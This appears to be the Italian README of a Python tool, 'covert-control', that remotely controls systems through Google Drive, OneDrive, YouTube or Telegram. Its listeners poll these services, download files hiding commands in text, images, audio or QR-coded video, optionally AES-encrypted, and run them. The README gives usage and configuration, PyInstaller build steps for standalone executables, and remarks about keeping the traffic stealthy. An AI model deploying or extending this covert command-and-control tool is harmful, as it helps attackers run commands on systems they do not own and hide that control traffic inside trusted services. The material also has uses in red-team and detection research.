
Google Drive, OneDrive e Youtube come canali occulti - Controlla sistemi da remoto caricando file su Google Drive, OneDrive, Youtube o Telegram
Controlla sistemi da remoto caricando file su Google Drive, OneDrive, Youtube o Telegram usando Python per creare i file e i listener. Permette di creare file di testo, immagini, audio o video, con i comandi in chiaro o crittografati usando AES.
covert-googledrive.py - Controlla sistemi caricando file in una cartella pubblica di Google Drive.
covert-onedrive.py - Controlla sistemi caricando file in una cartella pubblica di OneDrive.
covert-youtube.py - Controlla sistemi caricando video su Youtube (aggiornato da covert-tube).
covert-telegram.py - Controlla sistemi con un bot Telegram.
Puoi trovare file di esempio nella cartella test_files o crearne di nuovi con generate_file.py:
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
-t (--type) [Obbligatorio]: Tipi di file: "text", "image", "audio" o "video".
-o (--outputfile) [Opzionale]: File di output.
-c (--command) [Opzionale]: Comando da eseguire.
-e (--encrypted) [Opzionale]: Aggiungi questo flag per crittografare il comando con AES.
Esempi:
python3 generate_file.py -t text -c "whoami" -o text.txt
python3 generate_file.py -t text -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e
Valori di configurazione comuni:
data_type (Opzionale. Default: "text"):
Valori di configurazione specifici:
googledrive_folder: URL della cartella pubblica di Google Drive da monitorare (per covert-googledrive.py).
onedrive_folder: URL della cartella pubblica di OneDrive da monitorare (per covert-onedrive.py).
youtube_channel_id: ID del canale Youtube da monitorare. Puoi ottenerlo da qui (per covert-youtube.py).
youtube_api_key: Ottieni una chiave API creando un'applicazione e generando la chiave qui (per covert-youtube.py).
telegram_token: Token del bot, crealo usando BotFather. Scrivi "/newbot", poi invia un nome per il bot (ad esempio, "botname") e un username per il bot che termina con "-bot" (ad esempio, "somethingrandombot") (per covert-telegram.py).
telegram_username: Specifica un username Telegram in modo che esegua solo i comandi ricevuti da questo utente (senza "@").
Permette di eseguire comandi caricando file di testo, immagini, audio e video, non crittografati o crittografati con AES. L'argomento di input opzionale è l'URL della cartella pubblica, che può essere configurato anche in config.py:
python3 covert-googledrive.py [FOLDER_URL]
Il listener controllerà la cartella di Google Drive ogni 300 secondi per impostazione predefinita (può essere modificato in config.py). In questo caso viene caricato un video, "video.avi", con il comando nel QR del video:

Dopo aver rilevato un nuovo file caricato nella cartella, viene scaricato, elaborato e i comandi vengono eseguiti:

Permette di eseguire comandi caricando file di testo, immagini, audio e video, non crittografati o crittografati con AES. L'argomento di input opzionale è l'URL della cartella pubblica, che può essere configurato anche in config.py:
python3 covert-onedrive.py [FOLDER_URL]
Il listener controllerà la cartella di OneDrive ogni 300 secondi per impostazione predefinita (può essere modificato in config.py). In questo caso viene caricato un audio, "audio_encrypted.wav", con il comando crittografato con AES:

Dopo aver rilevato un nuovo file caricato nella cartella, viene scaricato, elaborato e i comandi vengono eseguiti:

NOTA: Questo funzionerà solo se non elimini alcun file nella cartella; se lo fai, devi crearne una nuova. Sarebbe possibile implementarlo per funzionare anche dopo l'eliminazione dei file, ma sarebbe necessario creare molte richieste e sarebbe meno furtivo.
Permette di eseguire comandi caricando video, non crittografati o crittografati con AES. Gli argomenti di input opzionali sono l'ID del canale Youtube da monitorare e la chiave API, che possono essere configurati anche in config.py:
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]
Il listener controllerà il canale Youtube ogni 300 secondi per impostazione predefinita (può essere modificato in config.py). Prima viene caricato il video:

Dopo aver rilevato un nuovo video nel canale, viene scaricato, elaborato e i comandi vengono eseguiti:

Controlla sistemi da remoto con un bot Telegram. Questa opzione non permette di caricare file, ma è possibile inviare i comandi in chiaro ("/cmd") o crittografati con AES ("/encrypted"). Il primo argomento di input opzionale è il token del bot, che può essere configurato anche in config.py; il secondo è usato per configurare un singolo utente Telegram che può inviare comandi al bot (senza "@"):
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]
Il listener controllerà i comandi nella chat e mostrerà l'output:
/cmd COMANDO_IN_CHIARO
/encrypted COMANDO_CRITTOGRAFATO_AES

sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
| data_type | Tipo di file | Crittografato | Valido per | Estensione |
|---|
| text | File di testo | No | Google Drive, OneDrive | .txt |
| text_encrypted | File di testo | Sì | Google Drive, OneDrive | .txt |
| image | Immagine | No | Google Drive, OneDrive | .png |
| image_encrypted | Immagine | Sì | Google Drive, OneDrive | .png |
| audio | Audio | No | Google Drive, OneDrive | .wav |
| audio_encrypted | Audio | Sì | Google Drive, OneDrive | .wav |
| video | Video | No | Google Drive, OneDrive, Youtube | .avi |
| video_encrypted | Video | Sì | Google Drive, OneDrive, Youtube | .avi |
delay_seconds (Opzionale. Default: 300): Secondi tra i controlli di nuovi file caricati nella cartella di Google Drive o OneDrive o nuovi video nel canale Youtube.
aes_key (Opzionale. Default: "covert-control21"): Chiave per la crittografia AES.
debug (Opzionale. Default: True): Stampa messaggi e timestamp nel listener o meno.